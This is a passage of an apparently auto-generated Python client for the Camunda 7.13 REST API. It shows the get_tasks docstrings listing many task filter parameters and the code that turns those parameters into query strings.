:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are sub tasks of the given task. Takes a task id.
:param str sort_by: Sort the results lexicographically by a given criterion. Must be used in conjunction with the sortOrder parameter.
:param str sort_order: Sort the results in a given order. Values may be asc for ascending order or desc for descending order. Must be used in conjunction with the sortBy parameter.
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return less results if there are no more results left.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[TaskDto]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_tasks_with_http_info(**kwargs) # noqa: E501
def get_tasks_with_http_info(self, **kwargs): # noqa: E501
"""get_tasks # noqa: E501
Queries for tasks that fulfill a given filter. The size of the result set can be retrieved by using the Get Task Count method. **Security Consideration:** There are several query parameters (such as assigneeExpression) for specifying an EL expression. These are disabled by default to prevent remote code execution. See the section on [security considerations](https://docs.camunda.org/manual/7.13/user-guide/process-engine/securing-custom-code/) for custom code in the user guide for details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tasks_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str process_instance_id: Restrict to tasks that belong to process instances with the given id.
:param str process_instance_id_in: Restrict to tasks that belong to process instances with the given ids.
:param str process_instance_business_key: Restrict to tasks that belong to process instances with the given business key.
:param str process_instance_business_key_expression: Restrict to tasks that belong to process instances with the given business key which is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_instance_business_key_in: Restrict to tasks that belong to process instances with one of the give business keys. The keys need to be in a comma-separated list.
:param str process_instance_business_key_like: Restrict to tasks that have a process instance business key that has the parameter value as a substring.
:param str process_instance_business_key_like_expression: Restrict to tasks that have a process instance business key that has the parameter value as a substring and is described by an expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str process_definition_id: Restrict to tasks that belong to a process definition with the given id.
:param str process_definition_key: Restrict to tasks that belong to a process definition with the given key.
:param str process_definition_key_in: Restrict to tasks that belong to a process definition with one of the given keys. The keys need to be in a comma-separated list.
:param str process_definition_name: Restrict to tasks that belong to a process definition with the given name.
:param str process_definition_name_like: Restrict to tasks that have a process definition name that has the parameter value as a substring.
:param str execution_id: Restrict to tasks that belong to an execution with the given id.
:param str case_instance_id: Restrict to tasks that belong to case instances with the given id.
:param str case_instance_business_key: Restrict to tasks that belong to case instances with the given business key.
:param str case_instance_business_key_like: Restrict to tasks that have a case instance business key that has the parameter value as a substring.
:param str case_definition_id: Restrict to tasks that belong to a case definition with the given id.
:param str case_definition_key: Restrict to tasks that belong to a case definition with the given key.
:param str case_definition_name: Restrict to tasks that belong to a case definition with the given name.
:param str case_definition_name_like: Restrict to tasks that have a case definition name that has the parameter value as a substring.
:param str case_execution_id: Restrict to tasks that belong to a case execution with the given id.
:param str activity_instance_id_in: Only include tasks which belong to one of the passed and comma-separated activity instance ids.
:param str tenant_id_in: Only include tasks which belong to one of the passed and comma-separated tenant ids.
:param bool without_tenant_id: Only include tasks which belong to no tenant. Value may only be `true`, as `false` is the default behavior.
:param str assignee: Restrict to tasks that the given user is assigned to.
:param str assignee_expression: Restrict to tasks that the user described by the given expression is assigned to. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_like: Restrict to tasks that have an assignee that has the parameter value as a substring.
:param str assignee_like_expression: Restrict to tasks that have an assignee that has the parameter value described by the given expression as a substring. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str assignee_in: Only include tasks which are assigned to one of the passed and comma-separated user ids.
:param str owner: Restrict to tasks that the given user owns.
:param str owner_expression: Restrict to tasks that the user described by the given expression owns. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_group: Only include tasks that are offered to the given group.
:param str candidate_group_expression: Only include tasks that are offered to the group described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param str candidate_user: Only include tasks that are offered to the given user or to one of his groups.
:param str candidate_user_expression: Only include tasks that are offered to the user described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool include_assigned_tasks: Also include tasks that are assigned to users in candidate queries. Default is to only include tasks that are not assigned to any user if you query by candidate user or group(s).
:param str involved_user: Only include tasks that the given user is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee).
:param str involved_user_expression: Only include tasks that the user described by the given expression is involved in. A user is involved in a task if an identity link exists between task and user (e.g., the user is the assignee). See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions.
:param bool assigned: If set to `true`, restricts the query to all tasks that are assigned.
:param bool unassigned: If set to `true`, restricts the query to all tasks that are unassigned.
:param str task_definition_key: Restrict to tasks that have the given key.
:param str task_definition_key_in: Restrict to tasks that have one of the given keys. The keys need to be in a comma-separated list.
:param str task_definition_key_like: Restrict to tasks that have a key that has the parameter value as a substring.
:param str name: Restrict to tasks that have the given name.
:param str name_not_equal: Restrict to tasks that do not have the given name.
:param str name_like: Restrict to tasks that have a name with the given parameter value as substring.
:param str name_not_like: Restrict to tasks that do not have a name with the given parameter value as substring.
:param str description: Restrict to tasks that have the given description.
:param str description_like: Restrict to tasks that have a description that has the parameter value as a substring.
:param int priority: Restrict to tasks that have the given priority.
:param int max_priority: Restrict to tasks that have a lower or equal priority.
:param int min_priority: Restrict to tasks that have a higher or equal priority.
:param str due_date: Restrict to tasks that are due on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.546+0200`.
:param str due_date_expression: Restrict to tasks that are due on the date described by the given expression. See the [User Guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_after: Restrict to tasks that are due after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.435+0200`.
:param str due_after_expression: Restrict to tasks that are due after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str due_before: Restrict to tasks that are due before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.243+0200`.
:param str due_before_expression: Restrict to tasks that are due before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_date: Restrict to tasks that have a followUp date on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str follow_up_date_expression: Restrict to tasks that have a followUp date on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_after: Restrict to tasks that have a followUp date after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.542+0200`.
:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are sub tasks of the given task. Takes a task id.
:param str sort_by: Sort the results lexicographically by a given criterion. Must be used in conjunction with the sortOrder parameter.
:param str sort_order: Sort the results in a given order. Values may be asc for ascending order or desc for descending order. Must be used in conjunction with the sortBy parameter.
:param int first_result: Pagination of results. Specifies the index of the first result to return.
:param int max_results: Pagination of results. Specifies the maximum number of results to return. Will return less results if there are no more results left.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[TaskDto], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'process_instance_id',
'process_instance_id_in',
'process_instance_business_key',
'process_instance_business_key_expression',
'process_instance_business_key_in',
'process_instance_business_key_like',
'process_instance_business_key_like_expression',
'process_definition_id',
'process_definition_key',
'process_definition_key_in',
'process_definition_name',
'process_definition_name_like',
'execution_id',
'case_instance_id',
'case_instance_business_key',
'case_instance_business_key_like',
'case_definition_id',
'case_definition_key',
'case_definition_name',
'case_definition_name_like',
'case_execution_id',
'activity_instance_id_in',
'tenant_id_in',
'without_tenant_id',
'assignee',
'assignee_expression',
'assignee_like',
'assignee_like_expression',
'assignee_in',
'owner',
'owner_expression',
'candidate_group',
'candidate_group_expression',
'candidate_user',
'candidate_user_expression',
'include_assigned_tasks',
'involved_user',
'involved_user_expression',
'assigned',
'unassigned',
'task_definition_key',
'task_definition_key_in',
'task_definition_key_like',
'name',
'name_not_equal',
'name_like',
'name_not_like',
'description',
'description_like',
'priority',
'max_priority',
'min_priority',
'due_date',
'due_date_expression',
'due_after',
'due_after_expression',
'due_before',
'due_before_expression',
'follow_up_date',
'follow_up_date_expression',
'follow_up_after',
'follow_up_after_expression',
'follow_up_before',
'follow_up_before_expression',
'follow_up_before_or_not_existent',
'follow_up_before_or_not_existent_expression',
'created_on',
'created_on_expression',
'created_after',
'created_after_expression',
'created_before',
'created_before_expression',
'delegation_state',
'candidate_groups',
'candidate_groups_expression',
'with_candidate_groups',
'without_candidate_groups',
'with_candidate_users',
'without_candidate_users',
'active',
'suspended',
'task_variables',
'process_variables',
'case_instance_variables',
'variable_names_ignore_case',
'variable_values_ignore_case',
'parent_task_id',
'sort_by',
'sort_order',
'first_result',
'max_results'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tasks" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'process_instance_id' in local_var_params and local_var_params['process_instance_id'] is not None: # noqa: E501
query_params.append(('processInstanceId', local_var_params['process_instance_id'])) # noqa: E501
if 'process_instance_id_in' in local_var_params and local_var_params['process_instance_id_in'] is not None: # noqa: E501
query_params.append(('processInstanceIdIn', local_var_params['process_instance_id_in'])) # noqa: E501
if 'process_instance_business_key' in local_var_params and local_var_params['process_instance_business_key'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKey', local_var_params['process_instance_business_key'])) # noqa: E501
if 'process_instance_business_key_expression' in local_var_params and local_var_params['process_instance_business_key_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyExpression', local_var_params['process_instance_business_key_expression'])) # noqa: E501
if 'process_instance_business_key_in' in local_var_params and local_var_params['process_instance_business_key_in'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyIn', local_var_params['process_instance_business_key_in'])) # noqa: E501
if 'process_instance_business_key_like' in local_var_params and local_var_params['process_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLike', local_var_params['process_instance_business_key_like'])) # noqa: E501
if 'process_instance_business_key_like_expression' in local_var_params and local_var_params['process_instance_business_key_like_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLikeExpression', local_var_params['process_instance_business_key_like_expression'])) # noqa: E501
if 'process_definition_id' in local_var_params and local_var_params['process_definition_id'] is not None: # noqa: E501
query_params.append(('processDefinitionId', local_var_params['process_definition_id'])) # noqa: E501
if 'process_definition_key' in local_var_params and local_var_params['process_definition_key'] is not None: # noqa: E501
query_params.append(('processDefinitionKey', local_var_params['process_definition_key'])) # noqa: E501
if 'process_definition_key_in' in local_var_params and local_var_params['process_definition_key_in'] is not None: # noqa: E501
query_params.append(('processDefinitionKeyIn', local_var_params['process_definition_key_in'])) # noqa: E501
if 'process_definition_name' in local_var_params and local_var_params['process_definition_name'] is not None: # noqa: E501
query_params.append(('processDefinitionName', local_var_params['process_definition_name'])) # noqa: E501
if 'process_definition_name_like' in local_var_params and local_var_params['process_definition_name_like'] is not None: # noqa: E501
query_params.append(('processDefinitionNameLike', local_var_params['process_definition_name_like'])) # noqa: E501
if 'execution_id' in local_var_params and local_var_params['execution_id'] is not None: # noqa: E501
query_params.append(('executionId', local_var_params['execution_id'])) # noqa: E501
if 'case_instance_id' in local_var_params and local_var_params['case_instance_id'] is not None: # noqa: E501
query_params.append(('caseInstanceId', local_var_params['case_instance_id'])) # noqa: E501
if 'case_instance_business_key' in local_var_params and local_var_params['case_instance_business_key'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKey', local_var_params['case_instance_business_key'])) # noqa: E501
if 'case_instance_business_key_like' in local_var_params and local_var_params['case_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKeyLike', local_var_params['case_instance_business_key_like'])) # noqa: E501
if 'case_definition_id' in local_var_params and local_var_params['case_definition_id'] is not None: # noqa: E501
query_params.append(('caseDefinitionId', local_var_params['case_definition_id'])) # noqa: E501
if 'case_definition_key' in local_var_params and local_var_params['case_definition_key'] is not None: # noqa: E501
query_params.append(('caseDefinitionKey', local_var_params['case_definition_key'])) # noqa: E501
if 'case_definition_name' in local_var_params and local_var_params['case_definition_name'] is not None: # noqa: E501
query_params.append(('caseDefinitionName', local_var_params['case_definition_name'])) # noqa: E501
if 'case_definition_name_like' in local_var_params and local_var_params['case_definition_name_like'] is not None: # noqa: E501
query_params.append(('caseDefinitionNameLike', local_var_params['case_definition_name_like'])) # noqa: E501
if 'case_execution_id' in local_var_params and local_var_params['case_execution_id'] is not None: # noqa: E501
query_params.append(('caseExecutionId', local_var_params['case_execution_id'])) # noqa: E501
if 'activity_instance_id_in' in local_var_params and local_var_params['activity_instance_id_in'] is not None: # noqa: E501
query_params.append(('activityInstanceIdIn', local_var_params['activity_instance_id_in'])) # noqa: E501
if 'tenant_id_in' in local_var_params and local_var_params['tenant_id_in'] is not None: # noqa: E501
query_params.append(('tenantIdIn', local_var_params['tenant_id_in'])) # noqa: E501
if 'without_tenant_id' in local_var_params and local_var_params['without_tenant_id'] is not None: # noqa: E501
query_params.append(('withoutTenantId', local_var_params['without_tenant_id'])) # noqa: E501
if 'assignee' in local_var_params and local_var_params['assignee'] is not None: # noqa: E501
query_params.append(('assignee', local_var_params['assignee'])) # noqa: E501
if 'assignee_expression' in local_var_params and local_var_params['assignee_expression'] is not None: # noqa: E501
query_params.append(('assigneeExpression', local_var_params['assignee_expression'])) # noqa: E501
if 'assignee_like' in local_var_params and local_var_params['assignee_like'] is not None: # noqa: E501
query_params.append(('assigneeLike', local_var_params['assignee_like'])) # noqa: E501
if 'assignee_like_expression' in local_var_params and local_var_params['assignee_like_expression'] is not None: # noqa: E501
query_params.append(('assigneeLikeExpression', local_var_params['assignee_like_expression'])) # noqa: E501
if 'assignee_in' in local_var_params and local_var_params['assignee_in'] is not None: # noqa: E501
query_params.append(('assigneeIn', local_var_params['assignee_in'])) # noqa: E501
if 'owner' in local_var_params and local_var_params['owner'] is not None: # noqa: E501
query_params.append(('owner', local_var_params['owner'])) # noqa: E501
if 'owner_expression' in local_var_params and local_var_params['owner_expression'] is not None: # noqa: E501
query_params.append(('ownerExpression', local_var_params['owner_expression'])) # noqa: E501
if 'candidate_group' in local_var_params and local_var_params['candidate_group'] is not None: # noqa: E501
query_params.append(('candidateGroup', local_var_params['candidate_group'])) # noqa: E501
if 'candidate_group_expression' in local_var_params and local_var_params['candidate_group_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupExpression', local_var_params['candidate_group_expression'])) # noqa: E501
if 'candidate_user' in local_var_params and local_var_params['candidate_user'] is not None: # noqa: E501
query_params.append(('candidateUser', local_var_params['candidate_user'])) # noqa: E501
if 'candidate_user_expression' in local_var_params and local_var_params['candidate_user_expression'] is not None: # noqa: E501
query_params.append(('candidateUserExpression', local_var_params['candidate_user_expression'])) # noqa: E501
if 'include_assigned_tasks' in local_var_params and local_var_params['include_assigned_tasks'] is not None: # noqa: E501
query_params.append(('includeAssignedTasks', local_var_params['include_assigned_tasks'])) # noqa: E501
if 'involved_user' in local_var_params and local_var_params['involved_user'] is not None: # noqa: E501
query_params.append(('involvedUser', local_var_params['involved_user'])) # noqa: E501
if 'involved_user_expression' in local_var_params and local_var_params['involved_user_expression'] is not None: # noqa: E501
query_params.append(('involvedUserExpression', local_var_params['involved_user_expression'])) # noqa: E501
if 'assigned' in local_var_params and local_var_params['assigned'] is not None: # noqa: E501
